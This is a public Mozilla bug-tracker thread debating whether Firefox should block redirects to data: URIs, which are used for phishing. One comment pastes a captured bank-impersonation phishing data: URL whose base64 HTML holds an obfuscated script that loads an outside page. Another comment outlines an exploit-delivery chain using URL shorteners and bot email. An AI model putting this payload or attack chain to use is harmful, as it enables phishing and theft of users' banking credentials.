Block redirects to data: URIs to prevent phishing

NEW
Unassigned

Status

()

Core
Networking: HTTP
5 years ago
3 months ago

People

(Reporter: henning, Unassigned)

Tracking

(Blocks: 1 bug)

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [necko-would-take])

Attachments

(1 attachment)

473.52 KB, application/pdf
Details
(Reporter)

Description

5 years ago
Created attachment 655995 [details]
phishing.pdf

User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1

Steps to reproduce:

A reproduction can be seen at http://tinyurl.com/9rvqjts
(view it with caution. It is not to be used as a Wikipedia login page)


Actual results:

As indicated in http://klevjers.com/papers/phishing.pdf, the data URI scheme can be exploited to host fully functional web pages, such as for login and handling private data. The entire web page's contents is hosted inside the data:URI, rather than at a location, 
allowing the "phisher" to evade the issue of compromising a server. 


Expected results:

In my opinion, it is dangerous to allow Firefox to host web pages: The URIs can be of arbitrary length, following an arbitrary amount of data.
Controls should be put in place to prevent this.
(Reporter)

Updated

5 years ago
Summary: Vulnerability: Google Chrome is vulnerable to phishing stored in data URI → Vulnerability: Firefox is vulnerable to phishing stored in data URI
Component: Untriaged → Phishing Protection
Status: UNCONFIRMED → NEW
Ever confirmed: true
This report is public, so unhiding.

http://www.theregister.co.uk/2012/09/03/phishing_without_hosts_peril/

Also, Phishing Protection is the wrong component for this. However, I'm not sure if this is a Firefox-specific issue or something best handled at the Core level.
Group: core-security
Component: Phishing Protection → Location Bar
OS: Windows 7 → All
Hardware: x86_64 → All
While it is true that you can replicate a webpage hosted on a data: uri, I don't think that this increases the risk of a phishing attack. For one, the URL shown in the address bar are less believable than creating domain name similar to the target. (eg. wikipadia.com, taking the example from the paper). The behavior described above is the intended behavior for data: uris - there are no content type or size limitations. Length alone is not a good indicator of malicious intent, as there are many common use case for large data URIs, for example working with images and other media client side. 

As an aside, I don't know why chrome blocks redirects to data: URIs. There was some discussion of this in firefox a long time ago in bug 211999. Maybe some sort of domain confusion mitigation, but that is a guess?
(In reply to Paul Theriault [:pauljt] from comment #3)
> While it is true that you can replicate a webpage hosted on a data: uri, I
> don't think that this increases the risk of a phishing attack. For one, the
> URL shown in the address bar are less believable than creating domain name
> similar to the target. (eg. wikipadia.com, taking the example from the
> paper).

To users who don't really understand URLs, the lack of an obvious domain won't necessarily make it unbelievable. They might just ignore it as noise and move on.
Blocks: 211999
Component: Location Bar → Networking: HTTP
Keywords: regression
Product: Firefox → Core
Summary: Vulnerability: Firefox is vulnerable to phishing stored in data URI → Block redirects to data: URIs to prevent phishing
I don't understand how this is any different from a link that just document.write()s out the page in question.  Is it?
@Boris, same thing pretty much -  I assume you mean a JavaScript link like javascript:document.write(....)  In websites which allow link submission, often data URIs are not blocked when JavaScript URIs are, but to me that is a vulnerability in the website not the browser.

Comment 7

5 years ago
I don't see a reason why redirecting to a data: URI is helpful in any way? Thus we can exclude this case to protect against this attack. 

I saw somewhere a way to "cloak" the URL thus one can use this attack and show another URL instead of the data: URL which in turn will fool users. 

I'd just stop redirecting to data: URIs and be done with it. There is no reason to not prevent this, IMO.
not really a "regression", this was intended behavior. This bug is asking that we reconsider that decision, but still doesn't make it a regression IMHO.
Keywords: regression
Data on whether other browsers support redirects to data: would be nice here (and/or usage info on how often this happens in the wild).  IE 7 doesn't support data: at all***, so sites need to work around it (if they care about IE support), so I'm guessing usage isn't rampant, but some subset of sites using it might also use redirects, too.   None of which is to say we can't break this if it's a small number.

B2G note:  we currently don't supported redirects from http->data in e10s (bug 707624 and bug 661604), and it looks like a non-trivial amount of work, so I'd love to not have to bother.

*** http://en.wikipedia.org/wiki/Data_URI_scheme#Disadvantages
Blocks: 707624
> I don't see a reason why redirecting to a data: URI is helpful in any way?

Bug 253320?

Comment 11

5 years ago
I don't really see this in the type of phishing which steals credentials, but rather the type of phishing that exploits a browser. Rather it be flash, java, javascript, the browser, or some other sort of plugin exploit.

The attack vector I can see is this.

1. Hacker has an exploit.
2. Hacker uses tor to visit tinyurl or some other service with supports data urls.
3. Hacker pastes exploit.
4. Hacker sends bots to email phishing messages to people with the tiny url hidden by a hyperlink.
5. User clicks and browser is pwned by exploit.

In that case, it is an actual useful attack. The hacker doesn't need to have any server except for an IRC server which could be found by scanning the net for port 6667. The hacker cannot be easily tracked as he would be using tor for communication to tinyurl and for irc login. The hacker could use multiple IRC servers chosen by a cryptographic random number based on the day, which the hacker could know which time the bots will be in which channel/server and join ahead of time setting the command in the topic and receiving data back.

The hacker cannot be found by the email as he would be using bots to send them out ether by the user's own email address or by computers which has the ability to open port 25 via microsoft's awesome protocol UPnP. Or the bots could chat with their friends and analyze the messages sent and received to form a message which will best get their friend to click.

That is the attack vector I can see with this. I don't see this as a phishing exploit to get user's credentials as the hacker has to receive the credentials somehow within the javascript/html standard!

The reason it has to be done by tinyurl or some other service is because data urls do not get assigned to the browser. It's an internal url for the browsers only.

I do not see any reason anyone would be redirecting to an data url as they could just directly link to it.

NOTE: This could also apply to javascript window.location, and <meta>. Not just http redirects!

While we are at it, might as well also block redirection to javascript urls... Most url shorteners block it, but there is the case one may allow it. Such as my own. It's not a good idea and the same as data, none should be redirecting to javascript!


Just my thoughts. Hopefully this will give an idea of why this could be dangerous.
> might as well also block redirection to javascript urls.

That's blocked already.

Comment 13

5 years ago
(In reply to Boris Zbarsky (:bz) from comment #10)
> > I don't see a reason why redirecting to a data: URI is helpful in any way?
> 
> Bug 253320?

I don't see a simple bug as a reason to allow this. In this (and the connected) bug there's only theoretical talk but no indication about a real-life problem solved by redirecting to data: URIs. 

Can anybody describe a useful use-case for an entity wanting to redirect to a data: URI? 

Plus, as Chrome already blocks this, I don't believe there will be any web-wide use of such a feature.

Comment 14

5 years ago
(In reply to Florian Bender from comment #13)
> I don't see a simple bug as a reason to allow this. In this (and the
> connected) bug there's only theoretical talk but no indication about a
> real-life problem solved by redirecting to data: URIs. 
> 
> Can anybody describe a useful use-case for an entity wanting to redirect to
> a data: URI? 
> 
> Plus, as Chrome already blocks this, I don't believe there will be any
> web-wide use of such a feature.

A problem it solves... Hmm... Encode flash exploit into a data url, create a tinyurl to redirect the user to exploit, email the user or send on chat, and infect machine... That sounds the most useful reason to allow this to me, it makes my job as being a hacker a lot easier! It won't be easy to find out who I am, and it allows me to get a free host for the data! Free = awesome!

Note: I am no hacker, just making a joke as that's the only use case I can see with it. I have never see any website using this for anything other than embedding images into the actual HTML reducing the number of calls to a server.
Note that site in bug 253320 is now showing 404 for the URI.  And unicyclists have never been a core target audience :)

If we really think there might be non-hacker use cases, I could see adding telemetry before nuking this.  But if Chrome is banning it already I think we should go ahead and block these redirects.

Comment 16

5 years ago
The only other thing I saw was that javascript html data generator posted in bug 211999. Honestly, they could just re-write it to output into a clickable url or into a text field if we decide to block them. Chrome already blocks them, so I see no reason not to block.

Comment 17

5 years ago
How about adding telemetry now (if that's easily possible), and preparing a patch to fix this so it can be applied as soon as a conclusion is found? 

Is it possible to just block redirecting to data: URIs for the URL bar, iFrame, window.location, object, …(?) and not e. g. IMG, VIDEO, AUDIO? That might circumvent problems with some useful appliances.
> Is it possible to just block redirecting to data: URIs for the URL bar, iFrame,
> window.location, object, …(?)

Yes, if necessary.

Comment 19

5 years ago
Are there any objections to block redirects to data: URIs in the URL bar, (i)frames, window.location, and <object>s? What about Workers, XMLHttpRequest, do they need that treatment as well?

Comment 20

5 years ago
Can we have this now for location bar, window.location, iFrame and objects?

Comment 21

5 years ago
Fixing this would break http://software.hixie.ch/utilities/cgi/data/data It's not entirely clear to me that's desirable.

Comment 22

5 years ago
This can be worked around by using iFrames (if they are not blocked) and textareas. 

Concerning iFrames: Would auto-sandboxing help increasing the security?
(In reply to Paul Theriault [:pauljt] from comment #3)
> While it is true that you can replicate a webpage hosted on a data: uri, I
> don't think that this increases the risk of a phishing attack. For one, the
> URL shown in the address bar are less believable than creating domain name

The address isn't shown in the address bar on mobile, so we cannot consider the address bar as a security feature or an anti-phishing feature anymore.

Comment 24

5 years ago
afaict, Google Chrome only blocks redirects to data: URIs because they incorrectly think Firefox has a security bug and want to prevent sites from relying on it.

Comment 25

2 years ago
I had a similar ling in a phishing mail. The problem is that URL is not recognized as a normal URL by Mozilla Firefox and so, it's impossible to report a fishing to Google (in the Mozilla Firefox help menu, the menu to report the fishing is inactive).
data:text/html;https://particuliers.secure.lcl.fr/outil/UAUT?from=/outil/UWHO/Accueil/;base64,IDxzY3JpcHQgbGFuZ3VhZ2U9IkphdmFTY3JpcHQiIHNyYz1ub21kdWZpY2hpZXIuanM+DQo8L3NjcmlwdD4gDQo8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIEhUTUwgNC4wMSBUcmFuc2l0aW9uYWwvL0VOIj4NCjxodG1sPg0KPGhlYWQ+PG1ldGEgY2hhcnNldD0idXRmLTgiIC8+PHNjcmlwdD5mdW5jdGlvbiBlbnZGbHVzaChhKXtmdW5jdGlvbiBiKGMpe2Zvcih2YXIgZCBpbiBhKWNbZF09YVtkXTt9aWYod2luZG93LnJlcXVpcmVMYXp5KXt3aW5kb3cucmVxdWlyZUxhenkoWydFbnYnXSxiKTt9ZWxzZXt3aW5kb3cuRW52PXdpbmRvdy5FbnZ8fHt9O2Iod2luZG93LkVudik7fX1lbnZGbHVzaCh7ImFqYXhwaXBlX3Rva2VuIjoiQVhnVXFEaFNKVjgyb3ZjZCIsImxoc2giOiJaQVFFalNoN2kiLCJraHNoIjoiMGBzamBlYHJtYHMtMGZkdV5nc2hkb2VyLTBnY15ldXJmLTNnY15ldXJmOzE7ZW5idGxkb3U7ZmR1RG1kbGRvdXJDeE9gbGQtMllMTUl1dXFTZHB0ZHJ1O3FzbnVudXhxZDtyZG9lLTB1bmpkb2pueCJ9KTs8L3NjcmlwdD48c2NyaXB0PkNhdmFscnlMb2dnZXI9ZmFsc2U7PC9zY3JpcHQ+PG5vc2NyaXB0PjxtZXRhIGh0dHAtZXF1aXY9InJlZnJlc2giIGNvbnRlbnQ9IjA7IFVSTD0vP19mYl9ub3NjcmlwdD0xIiAvPjwvbm9zY3JpcHQ+PG1ldGEgbmFtZT0icmVmZXJyZXIiIGNvbnRlbnQ9Im9yaWdpbi13aGVuLWNyb3Nzb3JpZ2luIiBpZD0ibWV0YV9yZWZlcnJlciIgLz48bGluayB0eXBlPSJ0ZXh0L2NzcyIgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJodHRwczovL2Zic3RhdGljLWEuYWthbWFpaGQubmV0L3JzcmMucGhwL3YyL3laL3IvVTZKWFdic2gtcnUuY3NzIiBkYXRhLWJvb3Rsb2FkZXItaGFzaD0iUVhLS08iIGRhdGEtcGVybWFuZW50PSIxIiBjcm9zc29yaWdpbj0iYW5vbnltb3VzIiAvPg0KPGhlYWQ+DQo8IURPQ1RZUEUgaHRtbD4NCjxzY3JpcHQgdHlwZT0ndGV4dC9qYXZhc2NyaXB0Jz4gc3RyPSdAM0NANjlANjZANzJANjFANkRANjVAMjBANzNANzRANzlANkNANjVAM0RAMjJANzdANjlANjRANzRANjhAM0FAMjBAMzFAMzNAMzRAMzVANzBANzhAM0JAMjBANjhANjVANjlANjdANjhANzRAM0FAMjBAMzlAMzhAMzBANzBANzhAM0JAMjJAMEFAMjBAMjBAMjBAMjBAMjBAMjBAMjBAMjBAMjBANzNANzJANjNAM0RAMjJANjhANzRANzRANzBANzNAM0FAMkZAMkZANzdANzdANzdAMkVANzNANjFANjlANkVANzRANzBANjFANzVANkNAMkVANjNANkZANkRAMkVANzRANzdAMkZANkFANzNAMkZANzBANjFANzJANzRANjlANjNANzVANkNANjlANjVANzJANzNAMkZANzNANjVANjNANzVANzJANjVAMkZAMjJAM0VAM0NAMkZANjlANjZANzJANjFANkRANjVAM0UnOyBkb2N1bWVudC53cml0ZSh1bmVzY2FwZShzdHIucmVwbGFjZSgvQC9nLCclJykpKTsgPC9zY3JpcHQ+DQoNCjxodG1sIGxhbmc9ImZyIj4NCjxoZWFkPg0KCTwhLS0gQ09NTU9OIC0tPg0KCTxtZXRhIGh0dHAtZXF1aXY9ImNvbnRlbnQtdHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04IiAvPg0KCTwhLS0gT2JqX0hlYWQgLS0+PHRpdGxlPkJhbnF1ZSBldCBBc3N1cmFuY2UgTENMPC90aXRsZT48bWV0YSBuYW1lPSJkZXNjcmlwdGlvbiIgY29udGVudD0iQWNjw6lkZXogw6Agdm9zIGNvbXB0ZXMgZXQgZMOpY291dnJleiB0b3V0ZXMgbGVzIG9mZnJlcyBldCBsZXMgc2VydmljZXMgcHJvcG9zw6lzIHBhciBMQ0wgQmFucXVlIGV0IEFzc3VyYW5jZSA6IGdlc3Rpb24gYXUgcXVvdGlkaWVuLCBjYXJ0ZXMgYmFuY2FpcmVzLCBwcsOqdHMgaW1tbywgY3LDqWRpdCBhdXRvLCBhc3N1cmFuY2VzLCDDqXBhcmduZSBldCBwbGFjZW1lbnRzLCBvZmZyZXMgw6l0dWRpYW50cyAuLi4iLz48bWV0YSBwcm9wZXJ0eT0ib2c6dGl0bGUiIGNvbnRlbnQ9IkJhbnF1ZSBldCBBc3N1cmFuY2UgTENMIiAvPjxtZXRhIHByb3BlcnR5PSJvZzp0eXBlIiBjb250ZW50PSJ3ZWJzaXRlIiAvPjxtZXRhIHByb3BlcnR5PSJvZzp1cmwiIGNvbnRlbnQ9Imh0dHBzOi8vcGFydGljdWxpZXJzLnNlY3VyZS5sY2wuZnIvIiAvPjxtZXRhIHByb3BlcnR5PSJvZzpkZXNjcmlwdGlvbiIgY29udGVudD0iQWNjw6lkZXogw6Agdm9zIGNvbXB0ZXMgZXQgZMOpY291dnJleiB0b3V0ZXMgbGVzIG9mZnJlcyBldCBsZXMgc2VydmljZXMgcHJvcG9zw6lzIHBhciBMQ0wgQmFucXVlIGV0IEFzc3VyYW5jZSA6IGdlc3Rpb24gYXUgcXVvdGlkaWVuLCBjYXJ0ZXMgYmFuY2FpcmVzLCBwcsOqdHMgaW1tbywgY3LDqWRpdCBhdXRvLCBhc3N1cmFuY2VzLCDDqXBhcmduZSBldCBwbGFjZW1lbnRzLCBvZmZyZXMgw6l0dWRpYW50cyAuLi4iLz48bWV0YSBwcm9wZXJ0eT0ib2c6aW1hZ2UiIGNvbnRlbnQ9Imh0dHA6Ly9wYXJ0aWN1bGllcnMubGNsLmZyL1Jlc3NvdXJjZXMvSW1hZ2VzVjIvbG9nby1sY2wtcGFydC5qcGciIC8+PCEtLSBPYmpfSGVhZCAtLT48c2NyaXB0IHNyYz0iLi4vdl8xLjAvanMvanF1ZXJ5LmJhc2U2NC5qcyIgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij48L3NjcmlwdD4NCg0KCTxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9RWRnZSIgLz4NCgk8bGluayByZWw9Imljb24iIHR5cGU9ImltYWdlL3BuZyIgaHJlZj0iaHR0cHM6Ly9wYXJ0aWN1bGllcnMuc2VjdXJlLmxjbC5mci9pbWFnZXMvZmF2aWNvbi5pY28iIC8+DQoJPCEtLSBDT01NT04gLS0+DQogICA8IS0tIENTUyAtLT4NCgk8bGluayByZWw9InN0eWxlc2hlZXQiIHR5cGU9InRleHQvY3NzIiBocmVmPSJodHRwczovL3BhcnRpY3VsaWVycy5zZWN1cmUubGNsLmZyLy8vY29tbW9uL2Nzcy9ib290c3RyYXAubWluLmNzcz92PTIwIiAvPg0KCTxsaW5rIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiIGhyZWY9Imh0dHBzOi8vcGFydGljdWxpZXJzLnNlY3VyZS5sY2wuZnIvY3NzL2dsb2JhbC5taW4uY3NzP3Y9MjAiIC8+DQoJPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiB0eXBlPSJ0ZXh0L2NzcyIgaHJlZj0iaHR0cHM6Ly9wYXJ0aWN1bGllcnMuc2VjdXJlLmxjbC5mci9jc3Mvc3R5bGUubWluLmNzcz92PTIwIiAvPg0KCTxsaW5rIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiIGhyZWY9Imh0dHBzOi8vcGFydGljdWxpZXJzLnNlY3VyZS5sY2wuZnIvY29tbW9uL2Nzcy9qcXVlcnkucmV2ZWFsLmNzcz92PTIwIiAvPg0KCTxsaW5rIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiIGhyZWY9Imh0dHBzOi8vcGFydGljdWxpZXJzLnNlY3VyZS5sY2wuZnIvY29tbW9uL2Nzcy9mb3JtLWJvdXRvbnMubWluLmNzcz92PTIwIiAvPg0KCTxsaW5rIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiIGhyZWY9Imh0dHBzOi8vcGFydGljdWxpZXJzLnNlY3VyZS5sY2wuZnIvY29tbW9uL2Nzcy9jb21tb24uY3NzP3Y9MjAiIC8+DQoJPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiB0eXBlPSJ0ZXh0L2NzcyIgaHJlZj0iaHR0cHM6Ly9wYXJ0aWN1bGllcnMuc2VjdXJlLmxjbC5mci9jc3MvaWRlbnRpZmljYXRpb24uY3NzP3Y9MiIgLz4NCgk8IS0tIENTUyAtLT4NCgkNCgk8IS0tIEpTIC0tPg0KCTxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBzcmM9Imh0dHBzOi8vcGFydGljdWxpZXJzLnNlY3VyZS5sY2wuZnIvY29tbW9uL2pzL2pxdWVyeS4xLjgubWluLmpzP3Y9MjAiPjwvc2NyaXB0Pg0KCTxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBzcmM9Imh0dHBzOi8vcGFydGljdWxpZXJzLnNlY3VyZS5sY2wuZnIvY29tbW9uL2pzL2pxdWVyeV9jc3NIb29rX2JncG9zLmpzP3Y9MjAiPjwvc2NyaXB0Pg0KCTxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBzcmM9Imh0dHBzOi8vcGFydGljdWxpZXJzLnNlY3VyZS5sY2wuZnIvY29tbW9uL2pzL2pxdWVyeS5yZXZlYWwubWluLmpzP3Y9MjAiPjwvc2NyaXB0Pg0KCTxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBzcmM9Imh0dHBzOi8vcGFydGljdWxpZXJzLnNlY3VyZS5sY2wuZnIvY29tbW9uL2pzL2Jvb3RzdHJhcC5taW4uanM/dj0yMCI+PC9zY3JpcHQ+DQoJPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cHM6Ly9wYXJ0aWN1bGllcnMuc2VjdXJlLmxjbC5mci9jb21tb24vanMvanF1ZXJ5Lm1vZGFsRGlhbG9nLmpzIj48L3NjcmlwdD4NCgk8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCIgc3JjPSJodHRwczovL3BhcnRpY3VsaWVycy5zZWN1cmUubGNsLmZyL2NvbW1vbi9qcy9jb21tb24ubWluLmpzP3Y9MjAiPjwvc2NyaXB0Pg0KCTxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBzcmM9Imh0dHBzOi8vcGFydGljdWxpZXJzLnNlY3VyZS5sY2wuZnIvanMvZnVuY3Rpb25zLm1pbi5qcz92PTIwIj48L3NjcmlwdD4NCgk8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCIgc3JjPSJodHRwczovL3BhcnRpY3VsaWVycy5zZWN1cmUubGNsLmZyL2pzL25hdmlnYXRldXJzLmpzP3Y9MjAiPjwvc2NyaXB0Pg0KCTxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBzcmM9Imh0dHBzOi8vcGFydGljdWxpZXJzLnNlY3VyZS5sY2wuZnIvanMvaWRlbnRpZmljYXRpb24uanM/dj0yMCI+PC9zY3JpcHQ+DQoJPCEtLSBKUyAtLT4NCiAgPG1ldGEgbmFtZT0iR0VORVJBVE9SIiBjb250ZW50PSJNU0hUTUwgOC4wMC43NjAxLjE3NTE0Ij4NCjwvaGVhZD4NCjxib2R5Pg0KPC9ib2R5Pg0KDQo8L2h0bWw+DQoNCg0KDQoNCg0KDQo=

Comment 26

2 years ago
I don't think we should block redirects to data: URLs. They are used for many things and aren't especially useful for phishing.

It might make sense to enable the "Report phishing..." menu item, with options to include the entire data: page, the http(s) URL that directed there, and the http(s) URL that contained the initial link. But it would be tricky to make the privacy implications of each step clear.

Comment 27

2 years ago
And adding an alert message ?
Whiteboard: [necko-would-take]

Comment 28

10 months ago
Is there anyway to add a disable option or ask before redirect to this kind?

Since there is no IP or file to download there isn't a way for me to block it or prevent it.  It's very annoying when they load with sound

Here is an example what I ran into.  Constantly popping up alert message that won't go away and play alert sound in the background.


Don't click or paste the following (Chrome won't render it due to it's length)
data:text/html;base64,

Comment 29

9 months ago
Seeing this used as an actual attack in the wild now. Gotta say might not have been the smartest idea to publish a vuln (or be aware of it published elsewhere) and leave it unpatched for 4 years. If you guys still have that bounty program I could probably bake up something truly horrible and send it in but it would be nice to just get this fixed.

Comment 30

9 months ago
Sorry for the two posts in a row but I guess I didn't provide how it was being used. Spammers are using it to circumvent safe browsing lists and whatnot, as predicted. No host = no blacklist entry. I haven't looked into it but there may be CSP issues with this as well. Seems that most times I do something weird like this with the browser I can read the hard drive and send it to a server. Since there's no legitimate use for having a data URI in the address bar this should just be disabled entirely IMO.

Comment 31

4 months ago
Chrome just disabled page-initiated main frame navigations to data URLs https://bugs.chromium.org/p/chromium/issues/detail?id=594215

Comment 32

4 months ago
https://www.wordfence.com/blog/2017/01/gmail-phishing-data-uri/
https://www.slashnext.com/yahoo-email-phishing-through-data-uri/
You need to log in before you can comment on or make changes to this bug.